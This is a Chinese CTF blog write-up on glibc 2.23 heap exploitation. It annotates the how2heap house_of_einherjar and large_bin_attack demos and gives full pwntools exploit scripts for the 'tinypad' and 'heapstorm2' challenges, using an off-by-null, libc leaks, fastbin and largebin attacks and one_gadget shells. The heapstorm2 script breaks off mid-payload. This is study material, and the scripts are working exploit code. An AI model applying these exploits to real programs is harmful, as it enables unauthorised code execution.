0%

how2heap - house_of_einherjar&tinypad

ubuntu16.04 libc2.23

house_of_einherjar.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

/*
Credit to st4g3r for publishing this technique
The House of Einherjar uses an off-by-one overflow with a null byte to control the pointers returned by malloc()
This technique may result in a more powerful primitive than the Poison Null Byte, but it has the additional requirement of a heap leak.
*/

/*
 * House of Einherjar walkthrough; every step is narrated on stderr.
 *
 * Sequence performed by this function:
 *   1. allocate 'a' (0x38 requested) and look up its usable size;
 *   2. build a six-word fake chunk in a local array whose pointer fields all
 *      point back at the array itself;
 *   3. allocate 'b' (0xf8 requested) and write a single zero byte at
 *      a[real_a_size], i.e. one byte past a's usable region;
 *   4. store (b - 16) - fake_chunk in the last sizeof(size_t) bytes of 'a'
 *      and in fake_chunk[1];
 *   5. free(b), then malloc(0x200) and print the returned pointer.
 *
 * The banner printed below states the demo was tested on Ubuntu 16.04 64-bit
 * with tcache disabled; the outcome depends on that allocator's behaviour.
 */
int main()
{
fprintf(stderr, "Welcome to House of Einherjar!\n");
fprintf(stderr, "Tested in Ubuntu 16.04 64bit.\n");
fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.\n");
fprintf(stderr, "This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");

uint8_t* a;
uint8_t* b;
uint8_t* d;

fprintf(stderr, "\nWe allocate 0x38 bytes for 'a'\n");
a = (uint8_t*) malloc(0x38);
fprintf(stderr, "a: %p\n", a);

// Usable size as reported by the allocator; a[real_a_size] is therefore the
// first byte past the region 'a' may legitimately write.
int real_a_size = malloc_usable_size(a);
fprintf(stderr, "Since we want to overflow 'a', we need the 'real' size of 'a' after rounding: %#x\n", real_a_size);

// create a fake chunk
fprintf(stderr, "\nWe create a fake chunk wherever we want, in this case we'll create the chunk on the stack\n");
fprintf(stderr, "However, you can also create the chunk in the heap or the bss, as long as you know its address\n");
fprintf(stderr, "We set our fwd and bck pointers to point at the fake_chunk in order to pass the unlink checks\n");
fprintf(stderr, "(although we could do the unsafe unlink technique here in some scenarios)\n");

// Word layout used below: [0] prev_size, [1] size, [2] fwd, [3] bck,
// [4] fwd_nextsize, [5] bck_nextsize.
size_t fake_chunk[6];

fake_chunk[0] = 0x100; // prev_size is now used and must equal fake_chunk's size to pass P->bk->size == P->prev_size
fake_chunk[1] = 0x100; // size of the chunk just needs to be small enough to stay in the small bin
fake_chunk[2] = (size_t) fake_chunk; // fwd
fake_chunk[3] = (size_t) fake_chunk; // bck
fake_chunk[4] = (size_t) fake_chunk; //fwd_nextsize
fake_chunk[5] = (size_t) fake_chunk; //bck_nextsize


// NOTE(review): the label "prev_size (not used)" printed below disagrees with
// the comment on fake_chunk[0] above, which says prev_size is now used.
fprintf(stderr, "Our fake chunk at %p looks like:\n", fake_chunk);
fprintf(stderr, "prev_size (not used): %#lx\n", fake_chunk[0]);
fprintf(stderr, "size: %#lx\n", fake_chunk[1]);
fprintf(stderr, "fwd: %#lx\n", fake_chunk[2]);
fprintf(stderr, "bck: %#lx\n", fake_chunk[3]);
fprintf(stderr, "fwd_nextsize: %#lx\n", fake_chunk[4]);
fprintf(stderr, "bck_nextsize: %#lx\n", fake_chunk[5]);

/* In this case it is easier if the chunk size attribute has a least significant byte with
* a value of 0x00. The least significant byte of this will be 0x00, because the size of
* the chunk includes the amount requested plus some amount required for the metadata. */
b = (uint8_t*) malloc(0xf8);
// real_b_size is computed but never read afterwards in this function.
int real_b_size = malloc_usable_size(b);

fprintf(stderr, "\nWe allocate 0xf8 bytes for 'b'.\n");
fprintf(stderr, "b: %p\n", b);

// The 8 bytes immediately before b's user pointer; the program treats them
// as b's size field (printed as "b.size" below).
uint64_t* b_size_ptr = (uint64_t*)(b - 8);
/* This technique works by overwriting the size metadata of an allocated chunk as well as the prev_inuse bit*/

fprintf(stderr, "\nb.size: %#lx\n", *b_size_ptr);
fprintf(stderr, "b.size is: (0x100) | prev_inuse = 0x101\n");
fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
// The emulated off-by-one: one zero byte written past the end of 'a'.
a[real_a_size] = 0;
fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);
fprintf(stderr, "This is easiest if b.size is a multiple of 0x100 so you "
"don't change the size of b, only its prev_inuse bit\n");
fprintf(stderr, "If it had been modified, we would need a fake chunk inside "
"b where it will try to consolidate the next chunk\n");

// Write a fake prev_size to the end of a
fprintf(stderr, "\nWe write a fake prev_size to the last %lu bytes of a so that "
"it will consolidate with our fake chunk\n", sizeof(size_t));
// Distance from fake_chunk to the address 2*sizeof(size_t) bytes before b's
// user pointer.
size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);
fprintf(stderr, "Our fake prev_size will be %p - %p = %#lx\n", b-sizeof(size_t)*2, fake_chunk, fake_size);
// Stored in the final sizeof(size_t) bytes of a's usable region.
*(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;

//Change the fake chunk's size to reflect b's new prev_size
fprintf(stderr, "\nModify fake chunk's size to reflect b's new prev_size\n");
fake_chunk[1] = fake_size;

// free b and it will consolidate with our fake chunk
fprintf(stderr, "Now we free b and this will consolidate with our fake chunk since b prev_inuse is not set\n");
free(b);
fprintf(stderr, "Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);

//if we allocate another chunk before we free b we will need to
//do two things:
//1) We will need to adjust the size of our fake chunk so that
//fake_chunk + fake_chunk's size points to an area we control
//2) we will need to write the size of our fake chunk
//at the location we control.
//After doing these two things, when unlink gets called, our fake chunk will
//pass the size(P) == prev_size(next_chunk(P)) test.
//otherwise we need to make sure that our fake chunk is up against the
//wilderness

fprintf(stderr, "\nNow we can call malloc() and it will begin in our fake chunk\n");
d = malloc(0x200);
fprintf(stderr, "Next malloc(0x200) is at %p\n", d);
}

通篇下来最重要的两点在size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);fake_chunk[1] = fake_size;

代码通过模拟漏洞修改了b的prev_inuse位为0,此时再free(b)的话就会触发向后合并,而向后合并时合并的chunk是由prev_size得到的,当我们把prev_size改成了(b的chunk header地址 - fake_chunk的header地址),就会在fake chunk处触发unlink从而导致fake_chunk被合并,而且此时由于紧邻top_chunk,top_chunk就直接被改到我们栈上fake_chunk处去了,再malloc的时候就可以把我们那块fake_chunk malloc出来

某种意义上来说这个好像也和house of force一样?是通过利用topchunk从而malloc出我们想要的地址来,(代码中写到的If it had been modified, we would need a fake chunk inside b where it will try to consolidate the next chunk,就是说如果我们在溢出的时候把size大小更改了,比如从0x101改成0x100,再去进行操作的时候由于此时得到的nextchunk在被更改chunk的内部,所以我们需要能够写到这个地方修改出一个假的chunk头才能不报错)

不过我有一点没弄明白:fake_chunk[0] = 0x100; // prev_size is now used and must equal fake_chunk's size to pass P->bk->size == P->prev_size,因为在这里设置了新top chunk之后好像没必要改这个prev_size?就算把这步操作改成0也还是一样达到了效果,所以这里好像有一个疑点(后来发现只是我单纯的把这个理解成设置top_chunk了,但其实这个利用说白了就是修改prev_size还有chunk的inuse位,用来overlap chunk也是一样的用法)

….感觉慢慢熟悉起堆来之后就不想写debug了23333,因为稍微进GDB看一下就能弄清楚了,所以也是直接撸题吧

tinypad

程序有很多小函数,这里就不做分析了,直接分析主要的逻辑或有漏洞的逻辑

程序分析

read_until

1583305845380

其中当i=len的时候,a1[i]=0的操作下标越界,可能会产生off_by_null

Add

1583304338827

首先从四个memo中获取一个size段为空的下标,然后malloc(size),size在1~0x100之间,对应的chunk大小也就是在0x20~0x110之间,然后根据存在bss的指针读入size的数据

delete

1583304560937

这里如果读入的下标是1对应数组下标0,判断对应处size是否为零,然后free掉ptr之后把size置零,没有把ptr置零

edit

1583304758155

edit稍微有点意思,因为我们的memo每次做操作都是从+16的位置开始的,开始的时候我没看懂这个是什么意思,后来在edit这里发现这个前面32*_QWORD的空间是用来当缓冲区的,edit之前先把下标对应的chunk中的内容用strcpy拷到memo缓冲区中去,然后用strlen获取缓冲区的长度,并将这段长度的内容输出,接着再通过strlen获取对应chunk中字符串的长度,然后read到缓冲区中去

Exploit&漏洞分析

漏洞应该比较明显了

  1. read_until的off_by_null
  2. 由于每次程序的显示是通过ptr是否为空来判断是否需要输出的,但是由于清除的是size,所以每次都会输出…直接leak各种base
  3. 结合上面的使用house_of_einherjar即可,不过我才知道这个用法原来是只要修改了prev_size然后用就好23333,本来以为是专门用来设置top_chunk的,不过也确实说明了prev_size确实可以改的很大,这是我之前在写题的时候没有想到的

有了漏洞思路之后我的做法大致就是,先malloc四个memo,然后泄露出libc和heap之后再把这几个全部free掉,用于重新构造利用的chunk结构

再次构造的时候大概就是这样:

0x101 0x71 0x101
填上自身指针用于unlink 用于fastbin attack、填上prev_size,还有off_by_null 修改这个chunk的prev_inuse位

free的时候就会直接把这三个全部都放到top_chunk里面去了,还有一个overlap的0x70 fastchunk

后续就是常规的fastbin attack了

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './tinypad' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
    """Log a labelled address through pwntools' ``log.info``.

    what    -- label text placed before the arrow.
    address -- integer printed in hexadecimal after the arrow.

    The message is wrapped in ANSI colour escape sequences.
    """
    log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

# todo here
def add(size,content):
    """Send the 'A' menu command, then the size and the content.

    Each answer is sent only after the matching prompt has been received.
    size    -- value sent (as decimal text) at the '(SIZE)>>> ' prompt.
    content -- payload sent with a trailing newline at '(CONTENT)>>> '.
    """
    p.recvuntil('(CMD)>>> ')
    p.sendline('A')
    p.recvuntil('(SIZE)>>> ')
    p.sendline(str(size))
    p.recvuntil('(CONTENT)>>> ')
    p.sendline(content)
def free(idx):
    """Send the 'D' menu command for memo ``idx``.

    idx is 0-based on the script side; idx + 1 is what gets sent at the
    '(INDEX)>>> ' prompt.
    """
    p.recvuntil('(CMD)>>> ')
    p.sendline('D')
    p.recvuntil('(INDEX)>>> ')
    p.sendline(str(idx+1))
def edit(idx,content):
    """Send the 'E' menu command for memo ``idx`` and confirm the change.

    idx     -- 0-based on the script side; idx + 1 is sent to the program.
    content -- replacement payload, sent with a trailing newline.

    The '(Y/n)>>> ' confirmation prompt is always answered with 'Y'.
    """
    p.recvuntil('(CMD)>>> ')
    p.sendline('E')
    p.recvuntil('(INDEX)>>> ')
    p.sendline(str(idx+1))
    p.recvuntil('(CONTENT)>>> ')
    p.sendline(content)
    p.recvuntil('(Y/n)>>> ')
    p.sendline('Y')

# Phase 1: fill four memo slots, then free two of them so the menu output
# that follows can be parsed for leaked pointers.
add(0xf0,'a'*0xf0)#0 0x100 chunk
add(0x100,'b'*0x100)#1 0x110 chunk
add(0xf0,'c'*0xf0)#2 0x100 chunk
add(0x100,'d'*0x100)#3 0x110 chunk
free(2)
free(0)
# Heap leak: 4 bytes read after the first 'CONTENT: ' marker, minus 0x210.
p.recvuntil('CONTENT: ')
heap_base=my_u64(p.recv(4))-0x210
loginfo('heapbase',heap_base)
# Libc leak: 6 bytes read from the entry printed as ' # INDEX: 3', minus 0x3c4b78.
p.recvuntil(' # INDEX: 3')
p.recvuntil('CONTENT: ')
libc_base=my_u64(p.recv(6))-0x3c4b78
loginfo('libcbase',libc_base)
free(3)
free(1)#clear

# Phase 2: rebuild the layout as 0x100 / 0x70 / 0x100 chunks.
#construct again
add(0xf0,p64(heap_base)*2+'\x00'*0xe0)#0 0x100
add(0x68,'\x00'*0x68)#1 0x70
add(0xf0,'\x00'*0xf0)#2 0x100

# Re-create memo 1 so that its last 8 bytes hold 0x170; sending the full 0x68
# bytes is what the original comment labels as the off-by-null trigger.
free(1)
add(0x68,'\x00'*0x60+p64(0x170))#set prev_size + off_by_null
free(2)#Merge all

# Phase 3: free memo 1, then re-allocate over the same region to plant
# libc_base+0x3c4aed behind a 0x71 size word.
free(1)#set to fastbin first
#(0,,,)
add(0xe0,'\x00'*0xe0)
#(0,1)
add(0xf0,(p64(0)+p64(0x71)+p64(libc_base+0x3c4aed)).ljust(0x70,'\x00')+p64(0)+p64(0x101)+'\x00'*(0xf0-0x80))#fill fakesize0x101 for check by free
#(0,1,2)
add(0x60,'\x00'*0x60)
#(0,1,2,3)
free(0)
#(,1,2,3)
# Payload: 0x13 padding bytes followed by libc_base+0xf02a4.
add(0x68,'\x00'*0x13+p64(libc_base+0xf02a4))
#(0,1,2,3)
#gdb.attach(p,'b *0x400c12')
free(3)
# Issue one more 'A' command with size 1, then hand control to the user.
p.recvuntil('(CMD)>>> ')
p.sendline('A')
p.recvuntil('(SIZE)>>> ')
p.sendline('1')


p.interactive()
'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
fastbin addree to size: (offset_to_fastbinY/8+2)<<(4 or 3)
largebin chunksize:0x410|0x450|0x490|0x4C0...
'''

how2heap - large_bin_attack&heapstorm2

ubuntu16.04 libc2.23

large_bin_attack.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
/*
This technique is taken from
https://dangokyo.me/2018/04/07/a-revisit-to-large-bin-in-glibc/
[...]
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
[...]
mark_bin (av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;
For more details on how large-bins are handled and sorted by ptmalloc,
please check the Background section in the aforementioned link.
[...]
*/

#include<stdio.h>
#include<stdlib.h>

/*
 * Large bin attack walkthrough; every step is narrated on stderr.
 *
 * Sequence performed by this function:
 *   1. allocate three chunks (0x320, 0x400, 0x400), each followed by a
 *      malloc(0x20) spacer;
 *   2. free p1 and p2, then malloc(0x90);
 *   3. free p3;
 *   4. overwrite words around the freed p2 (p2[-1], p2[0..3]) so that two of
 *      them hold addresses derived from &stack_var1 and &stack_var2;
 *   5. malloc(0x90) again and print both stack variables.
 *
 * The first message states the demo needs a glibc built without tcache.
 */
int main()
{
fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see glibc_build.sh for build instructions.\n");
fprintf(stderr, "This file demonstrates large bin attack by writing a large unsigned long value into stack\n");
fprintf(stderr, "In practice, large bin attack is generally prepared for further attacks, such as rewriting the "
"global variable global_max_fast in libc for further fastbin attack\n\n");

// The two write targets; both start at zero so a change is visible.
unsigned long stack_var1 = 0;
unsigned long stack_var2 = 0;

fprintf(stderr, "Let's first look at the targets we want to rewrite on stack:\n");
fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);

// p1 - 2 (two unsigned longs before the user pointer) is printed as the
// chunk address; the same convention is used for p2 and p3 below.
unsigned long *p1 = malloc(0x320);
fprintf(stderr, "Now, we allocate the first large chunk on the heap at: %p\n", p1 - 2);

fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with"
" the first large chunk during the free()\n\n");
malloc(0x20);

unsigned long *p2 = malloc(0x400);
fprintf(stderr, "Then, we allocate the second large chunk on the heap at: %p\n", p2 - 2);

fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with"
" the second large chunk during the free()\n\n");
malloc(0x20);

unsigned long *p3 = malloc(0x400);
fprintf(stderr, "Finally, we allocate the third large chunk on the heap at: %p\n", p3 - 2);

fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the top chunk with"
" the third large chunk during the free()\n\n");
malloc(0x20);

free(p1);
free(p2);
// p2[0] is read after free(p2): the demo deliberately prints the first word
// of the freed chunk's user area.
fprintf(stderr, "We free the first and second large chunks now and they will be inserted in the unsorted bin:"
" [ %p <--> %p ]\n\n", (void *)(p2 - 2), (void *)(p2[0]));

malloc(0x90);
fprintf(stderr, "Now, we allocate a chunk with a size smaller than the freed first large chunk. This will move the"
" freed second large chunk into the large bin freelist, use parts of the freed first large chunk for allocation"
", and reinsert the remaining of the freed first large chunk into the unsorted bin:"
" [ %p ]\n\n", (void *)((char *)p1 + 0x90));

free(p3);
fprintf(stderr, "Now, we free the third large chunk and it will be inserted in the unsorted bin:"
" [ %p <--> %p ]\n\n", (void *)(p3 - 2), (void *)(p3[0]));

//------------VULNERABILITY-----------

fprintf(stderr, "Now emulating a vulnerability that can overwrite the freed second large chunk's \"size\""
" as well as its \"bk\" and \"bk_nextsize\" pointers\n");
fprintf(stderr, "Basically, we decrease the size of the freed second large chunk to force malloc to insert the freed third large chunk"
" at the head of the large bin freelist. To overwrite the stack variables, we set \"bk\" to 16 bytes before stack_var1 and"
" \"bk_nextsize\" to 32 bytes before stack_var2\n\n");

// Per the message above: p2[-1] is the size, p2[1] the bk and p2[3] the
// bk_nextsize of the freed second chunk; p2[0] and p2[2] are zeroed.
p2[-1] = 0x3f1;
p2[0] = 0;
p2[2] = 0;
p2[1] = (unsigned long)(&stack_var1 - 2);
p2[3] = (unsigned long)(&stack_var2 - 4);

//------------------------------------

malloc(0x90);

fprintf(stderr, "Let's malloc again, so the freed third large chunk being inserted into the large bin freelist."
" During this time, targets should have already been rewritten:\n");

fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1);
fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2);

return 0;
}

感觉这种画个图的话就很明了,我这里画了一个free(p3)之后的图,unsortedbin上有两个chunk,largebin上有一个chunk

这时largebin中的chunk fd_nextsize和bk_nextsize都指向自己,再来看看等下把chunk从unsortedbin中卸下来之后插入largebin的时候是什么样的

largebin在原代码中的插入(largebin对应bin链有chunk的情况)是这样的:

1582823683795

当我们改了原largebin链中的chunk之后,就变成了这样

此时再插入0x410的chunk(对应victim),就会执行最下面那个else分支中的代码,

1
2
3
4
5
6
7
8
else{
victim->fd_nextsize = fwd;//此时的fwd指向0x3f0的chunk
victim->bk_nextsize = fwd->bk_nextsize;//栈指针给到victim的bk_nextsize
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;//此时var2对应的偏移刚好是->bk_nextsize->fd_nextsize
//所以var2会被赋值为victim
}
bck = fwd->bk;//此时bck被设置成了栈指针

接着看,因为后面还会执行一段代码

1
2
3
4
5
mark_bin (av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;//Here!栈指针指向位置的对应偏移处(var1)就也被赋值成了victim

原理就是这么个原理:向两个任意地址上写了victim的地址

下面直接撸题实操吧

heapstorm2

这个题说实话写的时候overlap之后都不知道该怎么用…所以后来就直接参考了wp(跪…真的是前路漫漫啊)

程序分析

首先根据程序的mmap创建一个新的segment,这样在IDA中看起来会好一些

init

程序用mallopt关掉了所有的fastbin,然后用mmap分配了一块固定地址的内存,并在random_area(0x13370800)为起始的位置存放了0x18个字节的随机数据,其中0偏移处的数据用来异或存放堆指针,+1偏移处的数据用来异或存放申请的size
然后+2和+3偏移处,也就是random_area[1]处的两个数据,是被设置成相等的

设置mask的意思也就是说我们在程序中申请的chunk指针还有对应的size都会被异或两个固定值然后放在这块内存区域

alloc

最多只能有16个chunk,按照顺序排放,其中mask_xor函数就是用来xor对应数据的了,mask1用来xor指针,mask2用来异或size,因为random_area的前四个qword都有意义所以我们看到的数组下标都是+2的(这里可以设置一下结构体再优化一下),calloc(size)之后没有赋值操作,所以只是分配

update

update函数中会往chunk里读入数据(长度不能大于size-0xc),在最后再加上0xc长度的数据HEAPSTORM_II,但是补0的时候发生了溢出,构成off_by_null,这也是程序的漏洞点所在

delete

1582822986854

delete函数就是输入下标然后free,并”清空”记录的数据

view

1582823036813

view函数比较苛刻,需要当我们random_area[1]处的两个值异或为0x13377331的时候才能writen,所以一开始leak不了,这也是我当时卡在这个题一直出不来的主要原因

漏洞分析&exploit

程序只有一个off_by_null,所以就只能shrink freed chunk然后构造overlap了(提醒一下自己以后shrink时一定要记得如果chunk被放回了bin链然后再用fit匹配出来时会触发unlink,如果不设置好fake prev_size,由于前面那个size已经被改了所以unlink检查时就会崩掉,免得老在这坑住)

然后后面的思路就是在random_area的上方利用largebin attack写上一个fakesize构造fake chunk,并在对应bk的地方也写上下图中victim的地址,首先是为了下一步操作时有个可写地址,但其实这个bk还有大用处

largebin attack之后利用overlap将映射区域对应fake chunk的固定地址写在新链入unsortedbin中的chunk的bk上,为了把random_area的内存calloc出来。这个过程可能有点绕,画个图帮自己理解一下(这里unsortedbin上的chunk是largebin attack之后放上去的,为了方便我就干脆画在一起了)

当我们利用largebin attack写上值之后,我们在fakechunk上已经有了size和bk,此时的bk是victim

但是由于PIE的映射是0x5?开头的地址,也就是说我们能接着calloc出来的chunk大小不能超过0x50,可用的地方还得再缩小之后减0xC。而且当mask损坏的时候如果指针都不变,将会没有办法继续进行操作(而且这块区域是被初始化过的,好像不能直接在操作中给mask赋值,不过利用那个字符串去计算一个说不定可以),我当时想尽办法想通过这个0x50的chunk实现exploit但是始终不行,所以就又去参考了师傅们的WP,发现师傅们是通过再构造一个再calloc出来的(跪),瞬间就好像又有思路了

我们写的bk是victim,所以calloc这个0x5?的chunk之后victim又被放到unsortedbin上面去了,但是如果这个victim chunk内容是我们通过overlap控制的话,就可以再接着控制其bk然后再calloc一个fake chunk,而且此时fakechunk的构造更简单了因为我们已经有了一个0x5?的chunk,可以直接写一个大一点的fakesize

在接着试图calloc random_area时,我们calloc出victim之后,还需要把fake chunk的bk再设置一下,因为unsortedbin卸下时需要可写地址,update那个0x5?的chunk就行(写的这个地址因为是libc的,所以在我这个利用中也发挥了很大的用处)

calloc出来这块mem之后,这里的值就全都被置零了,相当于列表清空..效果大概是这样的:

1582946763810

我这里没有清完,其实还可以清的更空一些,不过也够了。我的size设置的位置偏了8 23333因为当时怕影响到后面的数据

可以看到我们calloc出这块mem的时候,因为是先calloc再通过异或指针存到记录上,所以calloc之后的mask全都成0了,存上去的也就是真实值(0x133703d8 0xf0)

然后通过这个记录填上view需要的固定异或值,并填上我们前面写的libc地址的位置,还有size,直接读出来之后有任意地址写了就完事了!

我选择的是把__malloc_hook写成one_gadget,我看师傅们用的是__free_hook到system然后free一个有/bin/sh字符串的chunk,好像师傅们的更稳定一些,不过到后面任意地址读写之后就简单很多了也不多废话了

这里还记一个看师傅们博客看到的操作,就是largebin attack中如果我们能控制最开始的那个corrupt chunk就能多次利用进行largebin attack

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './heapstorm2' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
    """Log a labelled address through pwntools' ``log.info``.

    what    -- label text placed before the arrow.
    address -- integer printed in hexadecimal after the arrow.

    The message is wrapped in ANSI colour escape sequences.
    """
    log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
fastbin addree to size: (offset_to_fastbinY/8+2)<<(4 or 3)
largebin chunksize:0x410|0x450|0x490|0x4C0...
'''
# todo here
def alloc(size):
    """Send menu command '1' and answer the 'Size: ' prompt with ``size``."""
    p.recvuntil('Command: ')
    p.sendline('1')
    p.recvuntil('Size: ')
    p.sendline(str(size))
def update(idx,size,content):
    """Send menu command '2', then the index, size and content.

    idx     -- value sent at the 'Index: ' prompt (sent unchanged).
    size    -- value sent at the 'Size: ' prompt.
    content -- payload sent with a trailing newline at 'Content: '.
    """
    p.recvuntil('Command: ')
    p.sendline('2')
    p.recvuntil('Index: ')
    p.sendline(str(idx))
    p.recvuntil('Size: ')
    p.sendline(str(size))
    p.recvuntil('Content: ')
    p.sendline(content)
def delete(idx):
    """Send menu command '3' and answer the 'Index: ' prompt with ``idx``."""
    p.recvuntil('Command: ')
    p.sendline('3')
    p.recvuntil('Index: ')
    p.sendline(str(idx))
def view(idx):
    """Send menu command '4' and answer the 'Index: ' prompt with ``idx``.

    The program's reply is not consumed here; the caller reads it.
    """
    p.recvuntil('Command: ')
    p.sendline('4')
    p.recvuntil('Index: ')
    p.sendline(str(idx))

# Phase 1: initial layout of four chunks.
alloc(0x18)#0 for off_by_null
alloc(0xC30)#1 for split
alloc(0x18)#2 for merge
alloc(0x18)#3 guard

# Place 0xC00 at offset 0xBF0 inside chunk 1, free chunk 1, then fill chunk 0
# completely (0x18-0xc bytes of input) to trigger the off-by-null.
payload='\x33'*0xBF0+p64(0xC00)#set fake prev_size
update(1,len(payload),payload)
delete(1)#(0,,2,3)
update(0,0x18-0xc,'a'*(0x18-0xc))#off_by_null 0xC40->0xC00

#split 1 now
alloc(0xf0)#1 0x100 chunk
alloc(0x400)#4 0x410 chunk large
alloc(0x1f0)#5 0x200 chunk
alloc(0x410)#6 0x420 chunk large
#1 remain:0x131

delete(1)#(0,,2,3,4,5,6) for unlink
delete(2)#(0,,,3,4,5,6) merge&overlap

alloc(0xC50)#1 now chunk 1 overlap (4,5,6,remain) & remain to smallbin

# Phase 2: the new chunk 1 spans the others, so rewrite every size word in it.
#recover 0x410chunk's size & other chunk's size because of calloc--↓
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+='a'*0x400
payload+=p64(0)+p64(0x201)
payload+='a'*0x1f0
payload+=p64(0)+p64(0x421)
payload+='a'*0x410
payload+=p64(0)+p64(0x131)
update(1,len(payload),payload)
#------------------------------------------------------------------↑

#alloc(0x410)#2 !!!!!!!need a overlap chunk for victim do not alloc one like me before

delete(4)#(0,1,,3,,5,6) overlapped chunk 4 to ub
alloc(0x430)#2 set chunk 4 to largebin

# Phase 3: through chunk 1, overwrite the words that follow chunk 4's size
# with addresses just below 0x13370800.
#overwrite chunk 4 ------------------------↓
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+=p64(0)+p64(0x133707c3-0x10)#mmap region above the random area
payload+=p64(0)+p64(0x133707d8-0x20)
update(1,len(payload),payload)#set for largebin attack
#------------------------------------------↑

delete(6)#(0,1,2,3,,5) 0x420chunk to ub
alloc(0x440)#4 0x420 chunk to largebin(largebin attack)

#reset 0x200&0x130 chunk's prev_inuse---------↓
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+=p64(0)+p64(0x133707c3-0x10)#No other meanings,just ctrl+c ctrl+v
payload+=p64(0)+p64(0x133707d8-0x20)
payload+='a'*0x3e0
payload+=p64(0)+p64(0x201)
payload+='a'*0x1f0
payload+=p64(0)+p64(0x421)
payload+='a'*0x410
